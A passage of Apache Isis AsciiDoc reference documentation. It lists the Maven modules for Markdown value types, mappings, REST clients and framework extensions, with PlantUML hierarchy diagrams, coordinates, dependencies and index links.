+\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.ixn.v2.InteractionDtoPanelFactoriesWkt$Standalone +\n****\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/ui\/wkt\/IsisModuleValAsciidocUiWkt.adoc[IsisModuleValAsciidocUiWkt]\n****\n|===\n\n=== Markdown\n\n[plantuml,Markdown,svg]\n----\n@startuml(id=Markdown)\ntitle Markdown - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Markdown\\n[Software System]\" {\n rectangle \"==Apache Isis Val - Markdown (MetaModel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Val - Markdown (Persistence)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Val - Markdown (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Val - Markdown (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Val - Markdown (persistence jdo DN5)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Val - Markdown (ui wicket)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Val - Markdown (ui)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n}\n5 .[#707070].> 6 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n7 .[#707070].> 8 : \"\"\n@enduml\n----\n.Projects\/Modules (Markdown)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Val - Markdown (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown\nType: pom\nDirectory: \/valuetypes\/markdown\n----\n|Markdown value type.\n\n|Apache Isis Val - Markdown (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-applib\nType: jar\nDirectory: \/valuetypes\/markdown\/applib\n----\n|.Dependencies\n****\ncom.vladsch.flexmark:flexmark-all:jar:${flexmark.version} +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/applib\/IsisModuleValMarkdownApplib.adoc[IsisModuleValMarkdownApplib], xref:refguide:valuetypes:index\/markdown\/applib\/jaxb\/MarkdownJaxbAdapter.adoc[MarkdownJaxbAdapter], xref:refguide:valuetypes:index\/markdown\/applib\/value\/Converter.adoc[Converter]\n****\n\n|Apache Isis Val - Markdown (MetaModel)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-metamodel\nType: jar\nDirectory: \/valuetypes\/markdown\/metamodel\n----\n|.Components\n****\no.a.i.valuetypes.markdown.metamodel.MarkdownMetaModelRefiner +\no.a.i.valuetypes.markdown.metamodel.MarkdownValueTypeProvider +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/metamodel\/IsisModuleValMarkdownMetaModel.adoc[IsisModuleValMarkdownMetaModel]\n****\n\n|Apache Isis Val - Markdown (Persistence)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-persistence\nType: pom\nDirectory: \/valuetypes\/markdown\/persistence\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\n****\n\n|Apache Isis Val - Markdown (persistence jdo DN5)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-persistence-jdo-dn5\nType: jar\nDirectory: \/valuetypes\/markdown\/persistence\/jdo-dn5\n----\n|.Dependencies\n****\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\norg.datanucleus:datanucleus-core:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/persistence\/jdo\/dn5\/IsisModuleValMarkdownPersistenceJdoDn5.adoc[IsisModuleValMarkdownPersistenceJdoDn5], xref:refguide:valuetypes:index\/markdown\/persistence\/jdo\/dn5\/converters\/IsisMarkdownConverter.adoc[IsisMarkdownConverter]\n****\n\n|Apache Isis Val - Markdown (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-ui\nType: pom\nDirectory: \/valuetypes\/markdown\/ui\n----\n|.Dependencies\n****\ncom.vladsch.flexmark:flexmark-all:jar:${flexmark.version} +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\norg.jsoup:jsoup:jar:<managed> +\n****\n\n|Apache Isis Val - Markdown (ui wicket)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-ui-wkt\nType: jar\nDirectory: \/valuetypes\/markdown\/ui\/wicket\n----\n|.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/ui\/wkt\/IsisModuleValMarkdownUiWkt.adoc[IsisModuleValMarkdownUiWkt]\n****\n|===\n\n=== SSE\n\n== Mappings\n\n[plantuml,Mappings,svg]\n----\n@startuml(id=Mappings)\ntitle Mappings - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Mappings\\n[Software System]\" {\n rectangle \"==Apache Isis Mappings\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Mappings)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Mappings\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings\nType: pom\nDirectory: \/mappings\n----\n|Libraries and tools to map one bounded context (usually an Apache Isis application) to some other BC (usually\n_not_ an Apache Isis application).\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n|===\n\n=== JAX-RS Client Library\n\n[plantuml,JAX-RS Client Library,svg]\n----\n@startuml(id=JAX-RS_Client_Library)\ntitle JAX-RS Client Library - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JAX-RS Client Library\\n[Software System]\" {\n rectangle \"==Apache Isis Map - JaxRS Client (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Map - JaxRS Client (impl)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Map - JaxRS Client (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (JAX-RS Client Library)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Map - JaxRS Client (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-jaxrsclient\nType: pom\nDirectory: \/mappings\/jaxrsclient\n----\n|Integrates JaxRS Client Library\n\n|Apache Isis Map - JaxRS Client (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-jaxrsclient-applib\nType: jar\nDirectory: \/mappings\/jaxrsclient\/applib\n----\n|.Dependencies\n****\njavax:javaee-api:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/jaxrsclient\/applib\/IsisModuleExtJaxRsClientApplib.adoc[IsisModuleExtJaxRsClientApplib], xref:refguide:extensions:index\/jaxrsclient\/applib\/client\/JaxRsClient.adoc[JaxRsClient], xref:refguide:extensions:index\/jaxrsclient\/applib\/client\/JaxRsResponse.adoc[JaxRsResponse]\n****\n\n|Apache Isis Map - JaxRS Client (impl)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-jaxrsclient-impl\nType: jar\nDirectory: \/mappings\/jaxrsclient\/testlib\n----\n|.Dependencies\n****\norg.apache.isis.mappings:isis-mappings-jaxrsclient-applib:jar:<managed> +\n****\n|===\n\n=== REST Client\n\n[plantuml,REST Client,svg]\n----\n@startuml(id=REST_Client)\ntitle REST Client - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"REST Client\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - REST Client (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Ext - REST Client (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (REST Client)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - REST Client (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-restclient\nType: pom\nDirectory: \/mappings\/restclient\n----\n|A client for the Restful Objects Viewer\n\n|Apache Isis Ext - REST Client (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-restclient-applib\nType: jar\nDirectory: \/mappings\/restclient\/applib\n----\n|A client for the Restful Objects Viewer\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-restfulobjects-applib:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/restclient\/ActionParameterListBuilder.adoc[ActionParameterListBuilder], xref:refguide:extensions:index\/restclient\/IsisModuleExtRestClient.adoc[IsisModuleExtRestClient], xref:refguide:extensions:index\/restclient\/ResponseDigest.adoc[ResponseDigest], xref:refguide:extensions:index\/restclient\/RestfulClient.adoc[RestfulClient], xref:refguide:extensions:index\/restclient\/RestfulClientConfig.adoc[RestfulClientConfig], xref:refguide:extensions:index\/restclient\/RestfulClientException.adoc[RestfulClientException], xref:refguide:extensions:index\/restclient\/auth\/BasicAuthFilter.adoc[BasicAuthFilter], xref:refguide:extensions:index\/restclient\/log\/ClientConversationFilter.adoc[ClientConversationFilter], xref:refguide:extensions:index\/restclient\/log\/ClientConversationLogger.adoc[ClientConversationLogger]\n****\n|===\n\n== Extensions\n\n[plantuml,Extensions,svg]\n----\n@startuml(id=Extensions)\ntitle Extensions - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<22>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<23>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<24>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<13>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<14>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<15>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<16>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<17>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<18>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<19>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<20>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<21>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Extensions\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - CORS (impl)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Ext - CORS (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Ext - Flyway\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Ext - Flyway Impl\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Ext - Sec Man\\n<size:10>[Container: packaging: pom]<\/size>\" <<16>> as 16\n rectangle \"==Apache Isis Ext - Sec Man API\\n<size:10>[Container: packaging: jar]<\/size>\" <<17>> as 17\n rectangle \"==Apache Isis Ext - Sec Man Encryption (Using jbcrypt)\\n<size:10>[Container: packaging: jar]<\/size>\" <<18>> as 18\n rectangle \"==Apache Isis Ext - Sec Man Model\\n<size:10>[Container: packaging: jar]<\/size>\" <<19>> as 19\n rectangle \"==Apache Isis Ext - Sec Man Persistence (Using JDO)\\n<size:10>[Container: packaging: jar]<\/size>\" <<20>> as 20\n rectangle \"==Apache Isis Ext - Sec Man Persistence (Using JPA)\\n<size:10>[Container: packaging: jar]<\/size>\" <<21>> as 21\n rectangle \"==Apache Isis Ext - Sec Man Realm (Using Shiro)\\n<size:10>[Container: packaging: jar]<\/size>\" <<22>> as 22\n rectangle \"==Apache Isis Ext - Security - Shiro LDAP Realm (impl)\\n<size:10>[Container: packaging: jar]<\/size>\" <<24>> as 24\n rectangle \"==Apache Isis Ext - Security - Shiro LDAP Realm (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<23>> as 23\n rectangle \"==Apache Isis Ext - Wicket Viewer - Excel Download (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Ext - Wicket Viewer - Excel Download (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Ext - Wicket Viewer - fullcalendar (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Ext - Wicket Viewer - fullcalendar (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Ext - Wicket Viewer - fullcalendar (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<13>> as 13\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<14>> as 14\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<15>> as 15\n rectangle \"==Apache Isis Extensions\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n3 .[#707070].> 4 : \"\"\n7 .[#707070].> 8 : \"\"\n16 .[#707070].> 17 : \"\"\n16 .[#707070].> 18 : \"\"\n16 .[#707070].> 19 : \"\"\n16 .[#707070].> 20 : \"\"\n16 .[#707070].> 21 : \"\"\n16 .[#707070].> 22 : \"\"\n23 .[#707070].> 24 : \"\"\n5 .[#707070].> 6 : \"\"\n9 .[#707070].> 10 : \"\"\n9 .[#707070].> 11 : \"\"\n12 .[#707070].> 13 : \"\"\n12 .[#707070].> 14 : \"\"\n12 .[#707070].> 15 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 16 : \"\"\n2 .[#707070].> 23 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 12 : \"\"\n@enduml\n----\n.Projects\/Modules (Extensions)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Extensions\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions\nType: pom\nDirectory: \/extensions\n----\n|Extensions to the Apache Isis framework itself.\nThese are _not_ intended to be called by the domain logic of an Apache Isis application (see instead org.apache.isis.platform).\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Ext - CORS (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-cors\nType: pom\nDirectory: \/extensions\/vro\/cors\n----\n|Implementation of CORS Filter (using ebay filter)\n\n|Apache Isis Ext - CORS (impl)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-cors-impl\nType: jar\nDirectory: \/extensions\/vro\/cors\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/cors\/impl\/IsisModuleExtCorsImpl.adoc[IsisModuleExtCorsImpl]\n****\n\n|Apache Isis Ext - Wicket Viewer - Excel Download (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-exceldownload\nType: pom\nDirectory: \/extensions\/vw\/exceldownload\n----\n|A component for Apache Isis' Wicket viewer, providing an alternative representation of collections to be downloaded as an Excel spreadsheet.\n\n|Apache Isis Ext - Wicket Viewer - Excel Download (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-exceldownload-ui\nType: jar\nDirectory: \/extensions\/vw\/exceldownload\/ui\n----\n|.Components\n****\no.a.i.extensions.viewer.wicket.exceldownload.ui.components.CollectionContentsAsExcelFactory +\n****\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\norg.apache.poi:poi-ooxml:jar:<managed> +\norg.apache.poi:poi-ooxml-schemas:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/viewer\/wicket\/exceldownload\/ui\/IsisModuleExtExcelDownloadUi.adoc[IsisModuleExtExcelDownloadUi], xref:refguide:extensions:index\/viewer\/wicket\/exceldownload\/ui\/components\/CollectionContentsAsExcel.adoc[CollectionContentsAsExcel], xref:refguide:extensions:index\/viewer\/wicket\/exceldownload\/ui\/components\/CollectionContentsAsExcelFactory.adoc[CollectionContentsAsExcelFactory]\n****\n\n|Apache Isis Ext - Flyway\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-flyway\nType: pom\nDirectory: \/extensions\/core\/flyway\n----\n|Integrates Flyway when using any (relational) persistence store\n\n|Apache Isis Ext - Flyway Impl\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-flyway-impl\nType: jar\nDirectory: \/extensions\/core\/flyway\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.flywaydb:flyway-core:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\norg.springframework:spring-jdbc:jar:<managed> +\norg.springframework.boot:spring-boot-autoconfigure:jar:<managed> +\n****\n\n|Apache Isis Ext - Wicket Viewer - fullcalendar (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-fullcalendar\nType: pom\nDirectory: \/extensions\/vw\/fullcalendar\n----\n|A component for Apache Isis' Wicket viewer, displaying collections of objects that have a date on a fullcalendar.io (JavaScript widget).\n\n|Apache Isis Ext - Wicket Viewer - fullcalendar (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-fullcalendar-applib\nType: jar\nDirectory: \/extensions\/vw\/fullcalendar\/applib\n----\n|.Dependencies\n****\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/fullcalendar\/applib\/CalendarEventable.adoc[CalendarEventable], xref:refguide:extensions:index\/fullcalendar\/applib\/Calendarable.adoc[Calendarable], xref:refguide:extensions:index\/fullcalendar\/applib\/IsisModuleExtFullCalendarApplib.adoc[IsisModuleExtFullCalendarApplib], xref:refguide:extensions:index\/fullcalendar\/applib\/spi\/CalendarableDereferencingService.adoc[CalendarableDereferencingService], xref:refguide:extensions:index\/fullcalendar\/applib\/value\/CalendarEvent.adoc[CalendarEvent]\n****\n\n|Apache Isis Ext - Wicket Viewer - fullcalendar (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-fullcalendar-ui\nType: jar\nDirectory: \/extensions\/vw\/fullcalendar\/ui\n----\n|.Dependencies\n****\nnet.ftlines.wicket-fullcalendar:wicket-fullcalendar-core:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-fullcalendar-applib:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/fullcalendar\/ui\/component\/IsisModuleExtFullCalendarUi.adoc[IsisModuleExtFullCalendarUi]\n****\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs\nType: pom\nDirectory: \/extensions\/vw\/pdfjs\n----\n|A component for Apache Isis' Wicket viewer, allowing BLOBs containing PDFs to be rendered in a panel using pdf.js.\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs-applib\nType: jar\nDirectory: \/extensions\/vw\/pdfjs\/applib\n----\n|.Dependencies\n****\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/annotations\/PdfJsViewer.adoc[PdfJsViewer], xref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/config\/PdfJsConfig.adoc[PdfJsConfig], xref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/config\/Scale.adoc[Scale], xref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/spi\/PdfJsViewerAdvisor.adoc[PdfJsViewerAdvisor]\n****\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs-metamodel\nType: jar\nDirectory: \/extensions\/vw\/pdfjs\/metamodel\n----\n|.Components\n****\no.a.i.extensions.viewer.wicket.pdfjs.metamodel.facet.PdfJsViewerFacetFromAnnotationFactory$Register +\n****\n\n.Dependencies\n****\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-pdfjs-applib:jar:<managed> +\n****\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs-ui\nType: jar\nDirectory: \/extensions\/vw\/pdfjs\/ui\n----\n|.Components\n****\no.a.i.extensions.viewer.wicket.pdfjs.ui.components.PdfJsViewerPanelComponentFactory +\n****\n\n.Dependencies\n****\norg.apache.isis.extensions:isis-extensions-pdfjs-metamodel:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/ui\/IsisModuleExtPdfjsUi.adoc[IsisModuleExtPdfjsUi]\n****\n\n|Apache Isis Ext - Sec Man\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman\nType: pom\nDirectory: \/extensions\/security\/secman\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\n****\n\n|Apache Isis Ext - Sec Man API\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-api\nType: jar\nDirectory: \/extensions\/security\/secman\/api\n----\n|.Components\n****\no.a.i.extensions.secman.api.authorizor.AuthorizorSecman +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/api\/IsisModuleExtSecmanApi.adoc[IsisModuleExtSecmanApi], xref:refguide:extensions:index\/secman\/api\/SecmanConfiguration.adoc[SecmanConfiguration], xref:refguide:extensions:index\/secman\/api\/SecurityRealm.adoc[SecurityRealm], xref:refguide:extensions:index\/secman\/api\/SecurityRealmCharacteristic.adoc[SecurityRealmCharacteristic], xref:refguide:extensions:index\/secman\/api\/SecurityRealmService.adoc[SecurityRealmService], xref:refguide:extensions:index\/secman\/api\/authorizor\/AuthorizorSecman.adoc[AuthorizorSecman], xref:refguide:extensions:index\/secman\/api\/encryption\/PasswordEncryptionService.adoc[PasswordEncryptionService], xref:refguide:extensions:index\/secman\/api\/encryption\/PasswordEncryptionServiceNone.adoc[PasswordEncryptionServiceNone], xref:refguide:extensions:index\/secman\/api\/events\/UserCreatedEvent.adoc[UserCreatedEvent], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermission.adoc[ApplicationPermission], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionMode.adoc[ApplicationPermissionMode], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionRepository.adoc[ApplicationPermissionRepository], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionRule.adoc[ApplicationPermissionRule], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionValue.adoc[ApplicationPermissionValue], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionValueSet.adoc[ApplicationPermissionValueSet], 